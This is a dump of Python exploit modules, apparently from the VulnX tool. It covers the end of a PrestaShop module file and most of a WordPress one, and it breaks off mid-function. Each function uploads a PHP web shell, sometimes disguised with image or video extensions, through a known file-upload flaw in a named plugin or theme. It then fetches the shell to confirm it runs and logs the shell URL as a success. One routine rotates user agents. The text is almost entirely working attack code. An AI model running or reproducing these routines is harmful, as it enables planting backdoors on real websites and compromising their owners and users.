statusCheck: 200 | print(' %s cartabandonmentpro %s %s' %(que,vulnexploit,shellup)) 201 | else: 202 | print(' %s cartabandonmentpro %s' %(que , failexploit)) 203 | 204 | #cartabandonmentpro_old 205 | def cartabandonmentpro_old(url,headers): 206 | endpoint = url + "/modules/cartabandonmentproOld/upload.php" 207 | img = open('shell/VulnX.php.png', 'rb') 208 | name_img= os.path.basename('shell/VulnX.php.png') 209 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 210 | upload_file = Session.post(endpoint,files=files) 211 | shellup = url + "/modules/cartabandonmentproOld/uploads/VulnX.php.png?Vuln=X" 212 | checkShell = requests.get(shellup).text 213 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 214 | if statusCheck: 215 | print(' %s cartabandonmentpro_old%s %s' %(que,vulnexploit,shellup)) 216 | else: 217 | print(' %s cartabandonmentpro_old%s' %(que , failexploit)) 218 | 219 | #videostab 220 | def videostab(url,headers): 221 | endpoint = url + "/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload" 222 | img = open('shell/VulnX.php.mp4', 'rb') 223 | name_img= os.path.basename('shell/VulnX.php.mp4') 224 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 225 | upload_file = Session.post(endpoint,files=files) 226 | shellup = url + "/modules/videostab/uploads/VulnX.php.mp4?Vuln=X" 227 | checkShell = requests.get(shellup).text 228 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 229 | if statusCheck: 230 | print(' %s videostab %s %s' %(que,vulnexploit,shellup)) 231 | else: 232 | print(' %s videostab %s' %(que , failexploit)) 233 | 234 | #wg24themeadministration 235 | def wg24themeadministration(url,headers): 236 | endpoint = url + "/modules//wg24themeadministration/wg24_ajax.php" 237 | img = open('shell/VulnX.php', 'rb') 238 | name_img= os.path.basename('shell/VulnX.php') 239 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}), 240 | 'type' : 
'pattern_upload' } 241 | upload_file = Session.post(endpoint,files=files) 242 | shellup = url + "/modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X" 243 | checkShell = requests.get(shellup).text 244 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 245 | if statusCheck: 246 | print(' %s wg24themeadmin %s %s' %(que,vulnexploit,shellup)) 247 | else: 248 | print(' %s wg24themeadmin %s' %(que , failexploit)) 249 | 250 | #fieldvmegamenu 251 | def fieldvmegamenu(url,headers): 252 | endpoint = url + "/modules/fieldvmegamenu/ajax/upload.php" 253 | img = open('shell/VulnX.php', 'rb') 254 | name_img= os.path.basename('shell/VulnX.php') 255 | fieldname = "image[]" 256 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 257 | data = { fieldname : files } 258 | upload_file = Session.post(endpoint,data) 259 | shellup = url + "/modules/fieldvmegamenu/uploads/VulnX.php?Vuln=X" 260 | checkShell = requests.get(shellup).text 261 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 262 | if statusCheck: 263 | print(' %s fieldvmegamenu %s %s' %(que,vulnexploit,shellup)) 264 | else: 265 | print(' %s fieldvmegamenu %s' %(que , failexploit)) 266 | 267 | #wdoptionpanel 268 | def wdoptionpanel(url,headers): 269 | endpoint = url + "/modules/wdoptionpanel/wdoptionpanel_ajax.php" 270 | img = open('shell/VulnX.php', 'rb') 271 | name_img= os.path.basename('shell/VulnX.php') 272 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}), 273 | 'type' : 'pattern_upload' } 274 | upload_file = Session.post(endpoint,files=files) 275 | shellup = url + "/modules/wdoptionpanel/upload/VulnX.php?Vuln=X" 276 | checkShell = requests.get(shellup).text 277 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 278 | if statusCheck: 279 | print(' %s wdoptionpanel %s %s' %(que,vulnexploit,shellup)) 280 | else: 281 | print(' %s wdoptionpanel %s' %(que , failexploit)) 282 | 283 | #pk_flexmenu 284 | def pk_flexmenu(url,headers): 285 | endpoint 
= url + "/modules/pk_flexmenu/ajax/upload.php" 286 | img = open('shell/VulnX.php', 'rb') 287 | name_img= os.path.basename('shell/VulnX.php') 288 | fieldname = "image[]" 289 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 290 | data = { fieldname : files } 291 | upload_file = Session.post(endpoint,data) 292 | shellup = url + "/modules/pk_flexmenu/uploads/VulnX.php?Vuln=X" 293 | checkShell = requests.get(shellup).text 294 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 295 | if statusCheck: 296 | print(' %s pk_flexmenu %s %s' %(que,vulnexploit,shellup)) 297 | else: 298 | print(' %s pk_flexmenu %s' %(que , failexploit)) 299 | 300 | #pk_vertflexmenu 301 | def pk_vertflexmenu(url,headers): 302 | endpoint = url + "/modules/pk_vertflexmenu/ajax/upload.php" 303 | img = open('shell/VulnX.php', 'rb') 304 | name_img= os.path.basename('shell/VulnX.php') 305 | fieldname = "image[]" 306 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 307 | data = { fieldname : files } 308 | upload_file = Session.post(endpoint,data) 309 | shellup = url + "/modules/pk_vertflexmenu/uploads/VulnX.php?Vuln=X" 310 | checkShell = requests.get(shellup).text 311 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 312 | if statusCheck: 313 | print(' %s pk_flexmenu %s %s' %(que,vulnexploit,shellup)) 314 | else: 315 | print(' %s pk_flexmenu %s' %(que , failexploit)) 316 | 317 | #nvn_export_orders 318 | def nvn_export_orders(url,headers): 319 | endpoint = url + "/modules/nvn_export_orders/upload.php" 320 | img = open('shell/VulnX.php', 'rb') 321 | name_img= os.path.basename('shell/VulnX.php') 322 | fieldname = "image[]" 323 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 324 | data = { fieldname : files } 325 | upload_file = Session.post(endpoint,data) 326 | shellup = url + "/modules/nvn_export_orders/nvn_extra_add.php?Vuln=X" 327 | checkShell = requests.get(shellup).text 328 | statusCheck = 
re.findall(re.compile(r'Vuln X'),checkShell) 329 | if statusCheck: 330 | print(' %s nvn_export_orders %s %s' %(que,vulnexploit,shellup)) 331 | else: 332 | print(' %s nvn_export_orders %s' %(que , failexploit)) 333 | 334 | #tdpsthemeoptionpanel 335 | def tdpsthemeoptionpanel(url,headers): 336 | endpoint = url + "/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php" 337 | img = open('shell/VulnX.php', 'rb') 338 | name_img= os.path.basename('shell/VulnX.php') 339 | fieldname = "image[]" 340 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 341 | data = { fieldname : files } 342 | upload_file = Session.post(endpoint,data) 343 | shellup = url + "/modules/tdpsthemeoptionpanel/upload/VulnX.php?Vuln=X" 344 | checkShell = requests.get(shellup).text 345 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 346 | if statusCheck: 347 | print(' %s tdpsthemeoptionpanel %s %s' %(que,vulnexploit,shellup)) 348 | else: 349 | print(' %s tdpsthemeoptionpanel %s' %(que , failexploit)) 350 | 351 | #masseditproduct 352 | def masseditproduct(url,headers): 353 | endpoint = url + "/modules/lib/redactor/file_upload.php" 354 | img = open('shell/VulnX.php', 'rb') 355 | name_img= os.path.basename('shell/VulnX.php') 356 | fieldname = "image[]" 357 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 358 | data = { fieldname : files } 359 | upload_file = Session.post(endpoint,data) 360 | shellup = url + "/masseditproduct/uploads/file/VulnX.php?Vuln=X" 361 | checkShell = requests.get(shellup).text 362 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 363 | if statusCheck: 364 | print(' %s masseditproduct %s %s' %(que,vulnexploit,shellup)) 365 | else: 366 | print(' %s masseditproduct %s' %(que , failexploit)) -------------------------------------------------------------------------------- /modules/wpExploits.py: -------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | 
import datetime 4 | import requests 5 | import os 6 | now = datetime.datetime.now() 7 | year = now.strftime('%Y') 8 | month= now.strftime('%m') 9 | 10 | Session = requests.Session() 11 | 12 | from common.colors import failexploit , vulnexploit , que , info , good 13 | # Blaze SlideShow 14 | def wp_blaze(url,headers,vulnresults): 15 | headers['Content_Type'] = 'multipart/form-data' 16 | #options to send 17 | options = { 18 | 'album_img':[open('shell/VulnX.php','rb')], 19 | 'task':'blaze_add_new_album', 20 | 'album_name':'', 21 | 'album_desc':'' 22 | } 23 | endpoint = url + "/wp-admin/admin.php?page=blaze_manage" 24 | #requests.post alias sendrequest method in common folder. 25 | content = requests.post(endpoint,options,headers).text 26 | check_blaze = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content) 27 | if check_blaze: 28 | uploadfolder = check_blaze.group(1) 29 | dump_data = url + "/wp-content/uploads/blaze/"+uploadfolder+"/big/VulnX.php?Vuln=X" 30 | print (' %s Blaze SlideShow %s %s' %(que,vulnexploit,dump_data)) 31 | vulnresults.add('[SUCCESS] SlideShow -- Shell:' + dump_data) 32 | else: 33 | print (' %s Blaze SlideShow %s' %(que , failexploit)) 34 | vulnresults.add('[FAILED] SlideShow') 35 | # catpro method 36 | def wp_catpro(url,headers,vulnresults): 37 | headers['Content_Type'] = 'multipart/form-data' 38 | options = { 39 | 'album_img':[open('shell/VulnX.php','rb')], 40 | 'task':'cpr_add_new_album', 41 | 'album_name':'', 42 | 'album_desc':'' 43 | } 44 | endpoint = url + "/wp-admin/admin.php?page=catpro_manage" 45 | content = requests.post(endpoint,options,headers).text 46 | check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content) 47 | if check_catpro: 48 | uploadfolder = check_catpro.group(1) 49 | dump_data = url + "/wp-content/uploads/catpro/"+uploadfolder+"/big/VulnX.php?Vuln=X" 50 | print (' %s Catpro Plugin %s %s' %(que,vulnexploit,dump_data)) 51 | vulnresults.add('[SUCCESS] Catpro -- Shell:' + dump_data) 52 | else: 53 | 
print (' %s Catpro Plugin %s' %(que , failexploit)) 54 | vulnresults.add('[FAILED] Catpro') 55 | 56 | # CherryFramework Method 57 | def wp_cherry(url,headers,vulnresults): 58 | headers['Content_Type'] = 'multipart/form-data' 59 | options = { 60 | 'file':open('shell/VulnX.php','rb') 61 | } 62 | endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php" 63 | response = requests.post(endpoint,options,headers).text 64 | dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X" 65 | content=requests.get(dump_data, headers).text 66 | check_cherry = re.findall("Vuln X", content) 67 | if check_cherry: 68 | print (' %s CherryFramework %s %s' %(que,vulnexploit,dump_data)) 69 | vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data) 70 | else: 71 | print (' %s CherryFramework %s' %(que , failexploit)) 72 | vulnresults.add('[FAILED] CherryFramework') 73 | 74 | #Download Manager method 75 | def wp_dm(url,headers,vulnresults): 76 | headers['Content_Type'] = 'multipart/form-data' 77 | options = { 78 | 'upfile':open('shell/VulnX.php','rb'), 79 | 'dm_upload':'' 80 | } 81 | send_shell = requests.post(url,options,headers).text 82 | dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X" 83 | content=requests.get(dump_data,headers).text 84 | check_dm = re.findall("Vuln X", content) 85 | if check_dm: 86 | print (' %s Download Manager %s %s' %(que,vulnexploit,dump_data)) 87 | vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data) 88 | else: 89 | print (' %s Download Manager %s' %(que , failexploit)) 90 | vulnresults.add('[FAILED] Download Manager') 91 | 92 | #powerzoomer method 93 | def wp_powerzoomer(url,headers,vulnresults): 94 | endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage" 95 | headers['Content_Type'] = 'multipart/form-data' 96 | options = { 97 | 'album_img':[open('shell/VulnX.php','rb')], 98 | 'task':'pwz_add_new_album', 99 | 'album_name':'', 100 | 
'album_desc':'' 101 | } 102 | response = requests.post(endpoint,options,headers).text 103 | check_powerzoomer = re.findall("\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response) 104 | if check_powerzoomer: 105 | uploadfolder = check_powerzoomer.group(1) 106 | dump_data = url + "/wp-content/uploads/powerzoomer/"+uploadfolder+"/big/VulnX.php?Vuln=X" 107 | print (' %s Powerzoomer %s %s' %(que,vulnexploit,dump_data)) 108 | vulnresults.add('[SUCCESS] Powerzoomer -- Shell:' + dump_data) 109 | else: 110 | print (' %s Powerzoomer %s' %(que , failexploit)) 111 | vulnresults.add('[FAILED] Powerzoomer') 112 | 113 | # wp_revslider method 114 | def wp_revslider(url,headers,vulnresults): 115 | endpoint = url + "/wp-admin/admin-ajax.php" 116 | headers={ 117 | 'Cookie':'', 118 | 'Content_Type' : 'form-data', 119 | 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' 120 | } 121 | options = { 122 | 'action':'revslider_ajax_action', 123 | 'client_action':'update_plugin', 124 | 'update_file':[open('shell/VulnX.zip','rb')] 125 | } 126 | send_shell = requests.post(endpoint,options,headers).text 127 | revslidera=requests.post(url+"/wp-content/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 128 | revsliderb=requests.get(url+"/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 129 | revsliderc=requests.get(url+"/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 130 | revsliderd=requests.get(url+"/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 131 | revslidere=requests.get(url+"/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslid.texter/VulnX.php", headers).text 132 | 
revsliderf=requests.get(url+"/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/VulnX.php", headers).text 133 | revsliderg=requests.get(url+"/wp-content/themes/centum/revslider/temp/update_extract/revslider/VulnX.php", headers).text 134 | revsliderh=requests.get(url+"/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 135 | revslideri=requests.get(url+"/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 136 | revsliderj=requests.get(url+"/wp-content/themes/pindol/revslider/temp/update_extract/revslider/VulnX.php", headers).text 137 | revsliderk=requests.get(url+"/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 138 | revsliderl=requests.get(url+"/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 139 | revsliderm=requests.get(url+"/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 140 | check_revslidera = re.findall("Vuln X", revslidera) 141 | check_revsliderb = re.findall("Vuln X", revsliderb) 142 | check_revsliderc = re.findall("Vuln X", revsliderc) 143 | check_revsliderd = re.findall("Vuln X", revsliderd) 144 | check_revslidere = re.findall("Vuln X", revslidere) 145 | check_revsliderf = re.findall("Vuln X", revsliderf) 146 | check_revsliderg = re.findall("Vuln X", revsliderg) 147 | check_revsliderh = re.findall("Vuln X", revsliderh) 148 | check_revslideri = re.findall("Vuln X", revslideri) 149 | check_revsliderj = re.findall("Vuln X", revsliderj) 150 | check_revsliderk = re.findall("Vuln X", revsliderk) 151 | check_revsliderl = re.findall("Vuln X", revsliderl) 152 | check_revsliderm = re.findall("Vuln X", revsliderm) 153 | dump_data = "" 154 | if check_revslidera: 155 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 156 | print (' %s 
Injected Successfully \n %s %s' % ( good,info,dump_data)) 157 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 158 | elif check_revsliderb: 159 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 160 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 161 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 162 | elif check_revsliderc: 163 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 164 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 165 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 166 | elif check_revsliderd: 167 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 168 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 169 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 170 | elif check_revslidere: 171 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 172 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 173 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 174 | elif check_revsliderf: 175 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 176 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 177 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 178 | elif check_revsliderg: 179 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 180 | print (' %s Injected Successfully \n %s %s' % ( 
good,info,dump_data)) 181 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/centum/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 182 | elif check_revsliderh: 183 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 184 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 185 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 186 | elif check_revslideri: 187 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 188 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 189 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 190 | elif check_revsliderj: 191 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 192 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 193 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/pindol/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 194 | elif check_revsliderk: 195 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 196 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 197 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 198 | elif check_revsliderl: 199 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 200 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 201 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 202 | elif check_revsliderm: 203 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 204 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 205 | vulnresults.add('[SUCCESS] 
Revslider -- Shell:' + url+"/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 206 | else: 207 | print (' %s Revslider %s' %(que , failexploit)) 208 | vulnresults.add('[FAILED] Revslider') 209 | 210 | # Formcraft 211 | def wp_fromcraft(url,headers,vulnresults): 212 | shell = open('shell/VulnX.php','rb') 213 | fields= "files[]" 214 | headers['Content_Type'] = 'multipart/form-data' 215 | options = { 216 | fields:shell 217 | } 218 | endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/" 219 | response = requests.post(endpoint,options,headers).text 220 | dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X" 221 | check_fromcraft = re.findall("\"files", response) 222 | if check_fromcraft: 223 | print (' %s Formcraft %s %s' %(que,vulnexploit,dump_data)) 224 | vulnresults.add('[SUCCESS] Formcraft -- Shell:' + dump_data) 225 | else: 226 | print (' %s Formcraft %s' %(que , failexploit)) 227 | vulnresults.add('[FAILED] Formcraft') 228 | # Job Manager 229 | def wp_jobmanager(url,headers,vulnresults): 230 | endpoint = url + "/jm-ajax/upload_file/" 231 | image = open('shell/VulnX.gif','rb') 232 | field = "file[]" 233 | headers['content-type'] = 'multipart/form-data' 234 | options = { 235 | field:image 236 | } 237 | 238 | send_image = requests.post(endpoint,options,headers).text 239 | dump_data = url + "/wp-content/uploads/job-manager-uploads/file/"+year+"/"+month+"/VulnX.gif" 240 | response=requests.get(dump_data, headers) 241 | res = response.headers['content-type'] 242 | check_jobmanager = re.findall("image\/gif", res) 243 | 244 | if check_jobmanager: 245 | print (' %s Job Manager %s %s' %(que,vulnexploit,dump_data)) 246 | vulnresults.add('[SUCCESS] Job Manager -- Shell:' + dump_data) 247 | else: 248 | print (' %s Job Manager %s' %(que , failexploit)) 249 | vulnresults.add('[FAILED] Job Manager') 250 | 251 | # Showbiz Pro 252 | def 
wp_showbiz(url,headers,vulnresults): 253 | endpoint = url + "/wp-admin/admin-ajax.php" 254 | #method to randomize the user agent [functionINfunction] 255 | def random_UserAgent(): 256 | useragents_rotate = [ 257 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 258 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 259 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 260 | "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 261 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 262 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" 263 | ] 264 | useragents_random = random.choice(useragents_rotate) 265 | return useragents_random 266 | useragent=random_UserAgent() 267 | headers['User-Agent'] = useragent 268 | headers['Content_Type'] = 'multipart/form-data' 269 | options = { 270 | "action":"showbiz_ajax_action", 271 | "client_action":"update_plugin", 272 | "update_file":[open('shell/VulnX.php','rb')] 273 | } 274 | send_shell = requests.post(endpoint,options,headers).text 275 | dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X" 276 | res=requests.get(dump_data, options).text 277 | check_showbiz = re.findall("Vuln X", res) 278 | if check_showbiz: 279 | print (' %s Showbiz Pro %s %s' %(que,vulnexploit,dump_data)) 280 | vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data) 281 | else: 282 | print (' %s Showbiz Pro %s' %(que , failexploit)) 283 | vulnresults.add('[FAILED] Showbiz Pro') 284 | # Synoptic method 285 | def wp_synoptic(url,headers,vulnresults): 286 | endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php" 287 | #shell directory 288 | shell = open('shell/VulnX.php','rb') 289 | field = "qqfile" 290 | headers['Content_Type'] = 
'multipart/form-data' 291 | options = { 292 | field:shell 293 | } 294 | send_shell = requests.post(endpoint,options,headers).text 295 | dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X" 296 | res=requests.get(dump_data, headers).text 297 | check_synoptic = re.findall("Vuln X", res) 298 | 299 | if check_synoptic : 300 | print (' %s Synoptic %s %s' %(que,vulnexploit,dump_data)) 301 | vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data) 302 | else: 303 | print (' %s Synoptic %s' %(que , failexploit)) 304 | vulnresults.add('[FAILED] Synoptic') 305 | 306 | # WPshop eCommerce method 307 | def wp_shop(url,headers,vulnresults): 308 | endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload" 309 | shell = open('shell/VulnX.php','rb') 310 | field = "wpshop_file" 311 | headers['Content_Type'] = 'multipart/form-data' 312 | options = { 313 | field:shell 314 | } 315 | send_shell = requests.post(endpoint,options,headers).text 316 | dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X" 317 | res=requests.get(dump_data, headers).text 318 | check_shop = re.findall("Vuln X", res) 319 | if check_shop: 320 | print (' %s WPshop eCommerce %s %s' %(que,vulnexploit,dump_data)) 321 | vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data) 322 | else: 323 | print (' %s WPshop eCommerce %s' %(que , failexploit)) 324 | vulnresults.add('[FAILED] WPshop eCommerce') 325 | 326 | # Simple Ads Manager 327 | def wp_adsmanager(url,headers,vulnresults): 328 | endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" 329 | shell = open('shell/VulnX.php','rb') 330 | field = "wpshop_file" 331 | headers['Content_Type'] = 'multipart/form-data' 332 | options = { 333 | 'uploadfile':shell, 334 | 'action':'upload_ad_image', 335 | 'path':'' 336 | } 337 | send_shell = requests.post(endpoint,options,headers).text 338 | dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/" 339 | 
res=requests.get(dump_data, headers).text 340 | check_adsmanager = re.findall("{\"status\":\"success\"}", res) 341 | if check_adsmanager: 342 | print (' %s Simple Ads Manager %s %s' %(que,vulnexploit,dump_data)) 343 | vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data) 344 | else: 345 | print (' %s Simple Ads Manager %s' %(que , failexploit)) 346 | vulnresults.add('[FAILED] Simple Ads Manager') 347 | 348 | # Wysija Newsletters 349 | def wp_wysija(url,headers,vulnresults): 350 | theme = "my-theme" 351 | endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" 352 | shell = open('shell/VulnX.php','rb') 353 | 354 | field = "wpshop_file" 355 | headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' 356 | headers['Content_Type'] = 'form-data' 357 | options = { 358 | 'theme':shell, 359 | 'overwriteexistingtheme':'on', 360 | 'action':'themeupload', 361 | 'submitter':'Upload' 362 | } 363 | send_shell = requests.post(endpoint,options,headers).text 364 | dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X" 365 | res=requests.get(dump_data, headers).text 366 | check_wysija = re.findall("Vuln X", res) 367 | if check_wysija: 368 | print (' %s Wysija Newsletters %s %s' %(que,vulnexploit,dump_data)) 369 | vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data) 370 | else: 371 | print (' %s Wysija Newsletters %s' %(que , failexploit)) 372 | vulnresults.add('[FAILED] Wysija Newsletters') 373 | 374 | # InBoundio Marketing 375 | def wp_inboundiomarketing(url,headers,vulnresults): 376 | endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" 377 | shell = open('shell/VulnX.php','rb') 378 | headers['Content_Type'] = 'multipart/form-data' 379 | options = { 380 | 'file':shell, 381 | } 382 | send_shell = requests.post(endpoint,options,headers).text 383 | dump_data = url + 
"/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X" 384 | res=requests.get(dump_data, headers).text 385 | check_wysija = re.findall("Vuln X", res) 386 | if check_wysija: 387 | print (' %s InBoundio Marketing %s %s' %(que,vulnexploit,dump_data)) 388 | vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data) 389 | else: 390 | print (' %s InBoundio Marketing %s' %(que , failexploit)) 391 | vulnresults.add('[FAILED] InBoundio Marketing') 392 | 393 | # AdBlocker 394 | def wp_adblockblocker(url,headers,vulnresults): 395 | endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2" 396 | shell = open('shell/VulnX.php','rb') 397 | headers['Content_Type'] = 'multipart/form-data' 398 | options = { 399 | 'popimg':shell, 400 | } 401 | send_shell = requests.post(endpoint,options,headers).text 402 | dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X" 403 | res=requests.get(dump_data, headers).text 404 | if re.findall("Vuln X", res): 405 | print (' %s adblockblocker %s %s' %(que,vulnexploit,dump_data)) 406 | vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data) 407 | else: 408 | print (' %s adblockblocker %s' %(que , failexploit)) 409 | vulnresults.add('[FAILED] adblockblocker') 410 | 411 | # levoslideshow 412 | def wp_levoslideshow(url,headers,vulnresults): 413 | endpoint = url + "/wp-admin/admin.php?page=levoslideshow_manage" 414 | shell = open('shell/VulnX.php','rb') 415 | headers['Content_Type'] = 'multipart/form-data' 416 | options = { 417 | 'album_img':shell, 418 | 'task' : 'lvo_add_new_album', 419 | 'album_name': '', 420 | 'album_desk': '', 421 | } 422 | send_shell = requests.post(endpoint,options,headers).text 423 | check = re.findall("/uploads/levoslideshow/(.*?)/big/VulnX.php/", send_shell) 424 | if check: 425 | dump_data = url + "/wp-content/uploads/levoslideshow/"+check.group(1)+"/big/VulnX.php?Vuln=X" 426 | print (' %s levoslideshow %s %s' %(que,vulnexploit,dump_data)) 427 
